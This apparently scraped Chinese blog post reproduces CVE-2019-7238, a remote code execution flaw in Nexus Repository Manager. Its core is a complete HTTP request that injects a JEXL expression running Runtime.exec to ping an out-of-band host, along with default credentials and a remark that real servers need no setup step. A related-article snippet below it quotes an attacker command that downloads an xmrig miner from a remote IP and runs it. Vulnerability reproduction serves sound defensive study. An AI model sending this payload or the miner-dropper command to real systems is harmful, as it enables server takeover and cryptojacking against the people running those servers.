Nexus Repository Manager 3 RCE CVE-2019-7238

0x00 参考链接

https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019

0x01 影响版本

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

0x02 复现环境搭建

操作系统： windows 10
nexus版本：Nexus Repository Manager 3.14.0-04
下载链接：
https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3
nexus运行需要安装jdk环境，而且jdk需要去oracle下载，openjdk不可以

下载完成后，解压nexus，在nexus-3.14.0-04\bin，执行
nexus.exe /run
直接访问localhost:8081 帐号密码 admin/admin123

0x03漏洞复现

首先需要上传一个资源，而真实环境则不需要，因为真实环境已经上传了assert

然后访问content selectors

抓包修改：

POST /service/extdirect HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 2b482005-c1c3-48b6-942f-70e5a5f6d773
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 398
Cookie: pgv_pvi=5464665088; _ga=GA1.1.452998845.1550474860; _gid=GA1.1.653552585.1550474860; NX-ANTI-CSRF-TOKEN=2b482005-c1c3-48b6-942f-70e5a5f6d773; NXSESSIONID=7bd0f929-d72f-407a-bc17-76c2dd98c6cf
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName(‘java.lang.Runtime‘).getRuntime().exec(‘ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org‘)"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":11}

需要修改的点： {"property":"type","value":"jexl"}
"value":"1.class.forName(‘java.lang.Runtime‘).getRuntime().exec(‘ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org‘)"

原文地址：http://blog.51cto.com/13770310/2351479

时间： 2024-08-29 04:47:13

Nexus Repository Manager 3 RCE CVE-2019-7238的相关文章

Maven私服搭建(Nexus Repository Manager 3)

下载和安装下载地址:https://help.sonatype.com/repomanager3/download 注意:Nexus Repository Manager 3是一个Java服务器应用程序,安装需要 jdk1.8以上的版本. 下载解压后,用命令行到解压目录的bin目录下运行 nexus.exe /run(Linux运行./nexus run),启动完成后会显示"Started Sonatype Nexus": ------------------------------

Nexus Repository Manager的应用

安装和运行Nexus Repository Manager很简单.您可以将存档文件解压缩到您有完全访问权限的目录中,也可以使用Docker映像安装它. 安装包下载:https://help.sonatype.com/repomanager3/download安装参考文档:https://help.sonatype.com/repomanager3 1, 下载安装包https://help.sonatype.com/repomanager3/download/download-archives--

Nexus Repository Manager OSS 代理p2源

用maven管理构建Eclipse RCP项目时,可能会用到p2源: http://download.eclipse.org/releases/mars/ 内网用户肯定希望能通过nexus服务器代理,就像其它maven源一样. 这个可以通过给nexus安装p2插件实现 : “nexus-p2-repository-plugin” 和 “nexus-p2-bridge-plugin” Nexus 专业版默认是有这两个插件的,Nexus OSS版本需要手动下载. -----------------

Nexus Repository Manager 搭建私有docker仓库

使用容器安装Nexus3 1.下载nexus3的镜像: docker pull sonatype/nexus3 2.使用镜像启动一个容器: docker run -d --name nexus --restart=always -p 5000:5000 -p 8081:8081 sonatype/nexus3 注:5000端口是用于镜像仓库的服务端口 8081 端口是nexus的服务端口 3.启动之后我们就可以通过http://服务器IP:8081访问. 默认账号密码为admin/admi

使用 Nexus Repository Manager 搭建私有docker仓库

docker pull sonatype/nexus3 2.使用镜像启动一个容器: docker run -d --name nexus --restart=always -p 5000:5000 -p 8081:8081 sonatype/nexus3 注:5000端口是用于镜像仓库的服务端口 8081 端口是nexus的服务端口 3.启动之后我们就可以通过http://服务器IP:8081访问. 默认账号密码为admin/admin123 通过浏览器访问Nexus: http://服务

Nexus Repository Manager 使用笔记

在使用maven是,因内外网限制往往需要配置自由的maven库,小编看见网上教程数不胜数,遍主动试试以下是下载地址 : http://www.sonatype.com/download-oss-sonatype 小编因为选择了3.0 呵呵呵,这是一个坑,后续再说,先上图: maven的版本无论是公司库还是等等比较常见的都是2.x 3.0版本是2016年4月才出来的,改善了很多体验,如可自动安装等优先,不用在像2.x版本去手动选择了,而且目前是自动部署,安装一步一步点击就到了如下界面.

Nexus Repository Manager 3.0 发布

著名仓库管理工具Nexus,在2016年4月6日发布3.0版本(包括OSS版),相较2.*版本有很大的改变: 1. 从底层重构,从而提高性能,增强扩展能力,并改善用户体验 2. 升级界面,增加更多的浏览,搜索和管理功能 3. 提供安装包,使部署更简单(安装完自动添加成服务,省去手动添加的麻烦) 4. 增加 Docker,NuGet,npm,Bower的支持 5. 提供新的管理接口,从而能自动管理任务. 注意: 3.0只能运行在JVM1.8下看到能支持Docker仓库,还是挺令人兴奋的.赶快看一

Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞

发现被执行的程序在xmrig在 /var/tmp/目录下 curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json & config.json内容如下: { "algo": &quo

Sonatype Nexus Repository Manager清除无用的docker镜像

1.创建定时任务 2.先run一下看是否能删除无用镜像原文地址:https://www.cnblogs.com/linyouyi/p/10899082.html